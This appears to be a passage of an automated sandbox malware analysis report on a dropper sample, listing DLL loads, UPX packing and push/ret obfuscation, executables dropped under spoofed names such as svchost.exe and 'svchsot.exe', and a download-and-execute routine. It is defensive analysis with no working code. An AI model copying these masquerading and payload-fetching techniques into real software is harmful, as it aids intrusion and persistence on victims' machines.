Source: C:\Windows\Temp\ .exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: profext.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\Temp\ .exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: avicap32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: msvfw32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: msvcp60.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\033726\svchost.exe	Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: avicap32.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: msvfw32.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: msvcp60.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\034031\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: apphelp.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: wininet.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: avicap32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: msvfw32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: winmm.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: winmm.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: urlmon.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: iertutil.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: srvcli.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: netutils.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: msvcp60.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: netapi32.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: samcli.dll
Source: C:\Windows\XXXXXX05CA35CC\svchsot.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: apphelp.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: wininet.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: avicap32.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: msvfw32.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: winmm.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: winmm.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: urlmon.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: iertutil.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: srvcli.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: netutils.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: msvcp60.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: netapi32.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: samcli.dll
Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\Temp\ .exe

Window found: window name: SysTabControl32

Jump to behavior

Source: C:\Windows\Temp\ .exe	Automated click: OK
Source: C:\Windows\Temp\ .exe	Automated click: OK
Source: C:\Windows\Temp\ .exe	Automated click: OK
Source: C:\Windows\Temp\ .exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Temp\ .exe

Window detected: Number of UI elements: 96

Source:	Binary string: f:\SystemTool Eng 19\SystemTool Eng 16\SystemTool Eng 52\SystemTool\Release\SystemTool.pdb source: G3izWAY3Fa.exe, 00000000.00000002.1327850381.0000000002851000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe, 00000005.00000000.1324754830.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe.0.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdbEG source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb4 source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\ntkrnlmp.pdb source: .exe, 00000005.00000002.2705674625.00000000024E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: -00c04fd929dbmp\\Symbols\winload_prod.pdbrord32_super_sbx\Adobe\Acrob source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405CFF

PE file contains sections with non-standard names

Source: v5.exe.0.dr

Static PE information: section name: UPX2

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Temp\v5.exe	Code function: 2_2_00408FB0 push eax; ret	2_2_00408FDE
Source: C:\Windows\Temp\server.exe	Code function: 3_2_004046E0 push eax; ret	3_2_0040470E
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10069820 push eax; ret	3_2_1006984E
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100FAA45 push edi; ret	3_2_100FAA46
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10025EF1 push cs; ret	3_2_10025EF2
Source: C:\Windows\Temp\v5.exe	Code function: 4_2_00408FB0 push eax; ret	4_2_00408FDE
Source: C:\Windows\Temp\ .exe	Code function: 5_2_004483B0 push eax; ret	5_2_004483CE
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00447450 push eax; ret	5_2_00447464
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00447450 push eax; ret	5_2_0044748C
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00449957 push ecx; ret	5_2_00449967
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_004046E0 push eax; ret	8_2_0040470E
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10069820 push eax; ret	8_2_1006984E
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100FAA45 push edi; ret	8_2_100FAA46
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10025EF1 push cs; ret	8_2_10025EF2

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Windows\Temp\server.exe	File created: C:\Windows\SysWOW64\033726\svchost.exe			Jump to dropped file
Source: C:\Windows\SysWOW64\033726\svchost.exe	File created: C:\Windows\SysWOW64\034031\svchost.exe			Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\Temp\server.exe	Executable created and started: C:\Windows\SysWOW64\033726\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Executable created and started: C:\Windows\SysWOW64\034031\svchost.exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Executable created and started: C:\Windows\temp\server.exe	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Executable created and started: C:\Windows\temp\ .exe	Jump to behavior
Source: unknown	Executable created and started: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
Source: unknown	Executable created and started: C:\Windows\XXXXXX05CA35CC\svchsot.exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Executable created and started: C:\Windows\temp\v5.exe	Jump to behavior

Contains functionality to download and launch executables

Source: C:\Windows\Temp\server.exe

Code function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,

3_2_10001A20

Creates processes with suspicious names

Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
Source: C:\Windows\Temp\ .exe	File created: \ .exe
